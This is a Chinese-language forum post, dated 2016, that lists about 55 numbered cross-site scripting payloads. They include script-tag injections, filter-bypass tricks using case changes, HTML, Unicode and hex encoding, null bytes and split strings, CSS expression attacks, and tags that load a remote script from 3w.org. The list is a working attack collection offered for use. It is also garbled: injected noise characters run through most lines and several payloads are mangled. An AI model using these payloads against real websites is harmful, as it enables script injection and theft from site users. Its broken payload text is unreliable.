(1)普通的XSS JavaScript注入6 a& r, |+ Q$ ?) `% X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 s& \& w2 Z+ h; v, V! `, D) T(99)另类弹框
$ J! D L2 l# G @<q/oncut=alert()>19 O, h4 F: @# U [
<s/onclick=alert()>b% S9 x. n9 E+ @
<XSS=" onclick="alert(1)//">clickme</SSX=">$ g: R: g8 h! y1 @# Q
<zzz onclick=alert`1`>clickme</zzz> ' k. |7 J5 F' J, X2 R" S7 L
<a onclick=alert`1`>clickme</a>3 V3 O/ \* Q: N) Q: }
<a=">clickme</a=">' z' W4 H# d2 H( d4 h
<a=">clickme</a>! A3 r0 X/ m1 `1 n4 M9 B2 Z
<z=">clickme</z=">
' [2 X) ]3 a9 c( x# |, V5 I<z onclick=alert`1`>clickme</z>9 \. w# l! D# X3 _
1 e Y/ p' `; \% e& ~: P(2)IMG标签XSS使用JavaScript命令+ ~" r# t3 Y1 b8 ]
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; d; O' p7 R, |, O1 r" D' p( A; p" X Z# I, X) ^$ N( ~4 K9 T6 C
(3)IMG标签无分号无引号
* E$ {5 B, x9 X/ ^) u<IMG SRC=javascript:alert(‘XSS’)>+ ?" ?+ A( B1 `& P
$ d6 I: M6 O+ G) c
(4)IMG标签大小写不敏感4 U$ O' P, g6 m# O7 n$ |& M1 l3 u1 W; }
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>' u# X$ d# Y. j" Q9 Y% s
$ a/ y |/ b- x, _* D
(5)HTML编码(必须有分号)) X3 J' J7 f2 b* Z
<IMG SRC=javascript:alert(“XSS”)>8 V; R4 {; m4 b: B8 @$ S1 N! y
$ |& Q1 f" j6 _: ~7 {' a% v(6)修正缺陷IMG标签
% R" a1 q# u7 v6 g<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 g+ _8 f! _/ M' m. D; c% x
% u1 ]; v+ A9 N$ o
(7)formCharCode标签(计算器)" ^. s( Z0 U! m8 u! l, Y$ \
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 W0 Q. A0 B7 C; v, [3 S4 j5 N, u G. ~6 o
(8)UTF-8的Unicode编码(计算器)
( G0 k/ s: h: Q<IMG SRC=jav..省略..S')>1 i8 ~9 | C6 E
) ^* {0 W8 I) ]
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 Z: f! N7 p+ Y4 a8 G v" G8 ]- p: }, ^; A<IMG SRC=jav..省略..S')>
2 Q, P& a9 S( E8 {7 e" ] c9 A5 q) t2 h: i( n5 y# M
(10)十六进制编码也是没有分号(计算器)" F* j* q) y* _: o7 Y, Y
<IMG SRC=\'#\'" /span>
5 n% b) ~$ X: b$ G! h+ Y8 z" r8 A9 n8 C" y* K
(11)嵌入式标签,将Javascript分开
8 u$ P3 l0 ~; _. U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 t# Q; Q& z3 o7 q( X% g8 a/ }7 j
/ o8 ^+ @! m) N* p: `(12)嵌入式编码标签,将Javascript分开
/ s6 Q, ]6 x8 ~: R# H2 x! ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
( ` q# i& o. L# Y& s$ j+ b! p. ?- B' ]6 a, K
(13)嵌入式换行符0 ?6 y% D- g9 x. S1 ^3 b
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 a2 k- M+ A2 A; I5 z( ^: k' H* E) x- G- j7 n
(14)嵌入式回车( i. R- T6 A2 H0 o' h
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, Q) I+ S- J0 L# {( I
. m- r( d, {4 j: } S
(15)嵌入式多行注入JavaScript,这是XSS极端的例子2 n9 r5 z* n0 v; |8 E2 K) |
<IMG SRC=\'#\'" /span>
" K7 [. k* i" h0 c" {& k2 t$ k/ Y/ C3 W" [. R
(16)解决限制字符(要求同页面)5 z) Y+ @7 b. m0 X2 z- g
<script>z=’document.’</script>
9 c1 r- K6 E" v/ u# c+ P<script>z=z+’write(“‘</script>
$ l c; T3 a2 @; u<script>z=z+’<script’</script>( z: x2 h1 w) q5 y+ B% U
<script>z=z+’ src=ht’</script>
# Z- U6 o8 g; S) h& }* t3 g<script>z=z+’tp://ww’</script>! n! t w2 p+ K9 [. b/ z
<script>z=z+’w.shell’</script>
5 y- S* A* l2 r" o) I<script>z=z+’.net/1.’</script>1 o; m+ Y8 d; V0 u; R+ P
<script>z=z+’js></sc’</script>
8 L! I" }( v! x- u R, O ~<script>z=z+’ript>”)’</script>+ d5 C" t( q4 b0 v, s: x
<script>eval_r(z)</script>0 |2 Q1 w1 s: X# R6 n. t
: E& z% T/ \0 x# ^7 c
(17)空字符+ u7 {6 k$ {; ?& i# q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 O+ b% x. ]9 _8 K
" S; I, R7 ?) g(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 i0 [9 _4 [7 K: ~* O5 h6 g2 g) xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ y4 @( J$ d5 B" r6 }
5 h3 J& a) v9 y' J- B1 I2 t$ T(19)Spaces和meta前的IMG标签
. c. O) l0 o8 i2 R<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”># N9 H1 o# S& t3 l) e
$ E6 D' f: N# x' z, V1 [. _(20)Non-alpha-non-digit XSS
( u* v2 F, s2 b<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>; \ ^, o" {% ]: j3 ]' Y0 i
7 X+ H: [0 J8 @5 L# @/ w# U
(21)Non-alpha-non-digit XSS to 2
: x$ g% p6 P& C2 T3 u<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>, G$ g$ ~' j/ k: K# t5 }2 P
, Z% S0 l" p* p, h+ [, G(22)Non-alpha-non-digit XSS to 3
' c9 r: W( B8 w# r1 z) H# W<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
( _6 u6 ~" I% X# Z' b+ a+ h9 ~2 J, m
(23)双开括号
7 Q- ~" k2 i4 h) g; p5 m* C<<SCRIPT>alert(“XSS”);//<</SCRIPT>" X# j) N: p8 V$ |; Q* m$ K* g
+ L& t j) j k. o8 E
(24)无结束脚本标记(仅火狐等浏览器)" L' @0 f( _& {
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> M! i! {2 M( [6 {- x6 }
. N3 G6 |. v, B$ v! _ p% [6 A
(25)无结束脚本标记29 Y! u! Z8 Z, s0 [! F
<SCRIPT SRC=//3w.org/XSS/xss.js>
+ e# e4 Z! e4 N, [: [3 t- {' U
% Y6 e6 j/ S% w(26)半开的HTML/JavaScript XSS' j* z! z6 p; _$ \, V/ U9 `4 S. q0 E
<IMG SRC=\'#\'" /span>
7 A0 B! v' `% d6 c6 d
% { I0 s5 b3 k& p. A- f n( Y(27)双开角括号" ^' U5 q* G! o5 v5 h `& \
<iframe src=http://3w.org/XSS.html < t5 U+ `0 t$ D- F* o) H$ T) R
$ f" N, X0 Z0 m* U: `(28)无单引号 双引号 分号
* O% J, q# P Q/ e" d! l' Y<SCRIPT>a=/XSS/- \- Y; P j/ D, k. I3 F! B3 @( o
alert(a.source)</SCRIPT>- ^# [9 }% p7 Z+ p/ O
0 W! h" z& H v+ z$ }& F(29)换码过滤的JavaScript
1 |4 z$ U; o+ E! L2 a: }( N\”;alert(‘XSS’);//
! @' s0 ~) ?) W# v# _
8 M! Y. P; \- ]' O( V# o/ S(30)结束Title标签: k: a, I( g+ i- P, s% c
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT> {- W1 y4 c* p. ~* y' Q/ ]. ?
" U1 R7 Y8 x+ @- M1 {/ E! S(31)Input Image
# a) p7 f% |* C7 m) j$ s* ~<INPUT SRC=\'#\'" /span>
/ v& T/ b. z3 o H7 l! x4 y3 X
/ N) q- [; @* v4 A( M- z(32)BODY Image
. a) W9 a& F. S: S9 F% B<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 C" `& Z3 |7 |4 X! W, x
. @9 {% I: H8 Y: t- ~+ h(33)BODY标签
8 d# e. `$ z% d+ G, [" c<BODY(‘XSS’)>
; L' f2 H: M( c9 |9 h
! a1 H1 c3 o% i" e6 n(34)IMG Dynsrc
. l; v7 E+ O# s; {( a<IMG DYNSRC=\'#\'" /span>5 T% r3 b+ N2 V# M6 L c
: u# D% z7 f2 Y, a
(35)IMG Lowsrc* Y& g( \2 v% x/ Z
<IMG LOWSRC=\'#\'" /span>
. l j2 t* X9 L5 n6 O: k
- j3 F1 _' D) U# Y(36)BGSOUND
7 b& R- W8 a9 V3 V# i4 P<BGSOUND SRC=\'#\'" /span>9 V) y8 R6 u' j1 I2 ^, S. H
2 p6 @4 s+ ]8 z5 \/ `4 X(37)STYLE sheet# K6 b" {2 v6 Z
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% m2 k* G s* e
: [4 V: d( T; t; ~/ m! l+ r" M
(38)远程样式表
5 I: F6 T: i4 I; O# q( `& T& Y<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! s3 [- @6 ]2 n! @" M J: Y( |6 T* O7 Q* J4 T/ H
(39)List-style-image(列表式)) D3 ?5 W/ ~( B6 _5 m
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
5 {5 \, f! H+ B$ ?3 `( ]
0 z# b& ~& L k1 h) N# M$ ?: X(40)IMG VBscript- s" G4 q6 E, }. N- v
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
4 ]* D4 q# O! L, I+ Y* V. n4 @4 l9 k0 v# _" f
(41)META链接url0 v9 u0 m; |; V* _! O6 z
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 b0 Y5 a& C- X! S( a7 d. p( y- X
; m6 e9 n" Z+ u7 z* N(42)Iframe6 h5 i# m p7 H# V
<IFRAME SRC=\'#\'" /IFRAME>
" V% v3 O" K9 k1 V7 ]
! a0 l" O% q/ C* P) F( [2 H* y(43)Frame( ^! B6 Y4 w2 F% q; i6 J: r0 I6 w
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>% D; T* x4 n2 `, n. ~, P7 Z d
$ [- J) O2 Y: w* [& e(44)Table$ L1 v% H s& Q) n3 g
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
, T5 `* E( @1 ?3 P# _$ d! f4 b! ?7 t" x( s4 f/ s: P
(45)TD. q6 a3 q2 H/ G) z# C a& h
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 z& N: n5 A# H
* l5 E( u0 C2 A" {. B$ ]
(46)DIV background-image% s; w9 `) {% t( w4 b
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 R0 N! p4 z0 w4 @5 g D# s' u% E: o% ]5 T1 b0 ]
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)) [" S* i/ ?1 b( l5 i
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>2 ?1 V3 C, G( i" t
2 R1 }' d% y& L(48)DIV expression2 I( ^2 r( L ?. N7 w
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>: D0 Y L7 I! B! }
4 x$ L; G7 a( ?( w4 ?. n
(49)STYLE属性分拆表达# I$ T" G f- S, T4 U0 C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- e0 N1 f0 ?( l9 q: g5 G9 `5 M+ x, z1 s2 v+ }* K
(50)匿名STYLE(组成:开角号和一个字母开头)3 x6 |+ N8 T4 R A
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% h. h \* P: O/ J w- M
0 a) x& m: T: \: x. O9 e$ f3 u5 r# g; g
(51)STYLE background-image
& ?2 k- {" ^# t3 d0 {6 i. q. |<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' N& G! n! R B! N! n- ^
7 L; Y& w0 a% @(52)IMG STYLE方式
- ?2 v% d' P' ^6 p( Q. zexppression(alert(“XSS”))’>0 W$ L7 Z' j/ L8 B+ F9 w
; Q8 X) j6 G3 y/ d( D5 @3 K& B, A1 j M(53)STYLE background) c! x0 U# s( [
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
f( N% J2 v1 {
7 L4 t7 F3 _2 n, p(54)BASE
, G2 Q# I! Y6 P8 n3 |& `<BASE HREF=”javascript:alert(‘XSS’);//”>
0 G. D8 y2 N n; H L5 R2 ~; N8 |" ?8 ~
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* \9 W& G1 D f8 N) f2 d
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>: P# a- S' W% W
|
发表于 2016-4-28 10:06:15
收藏
支持
反对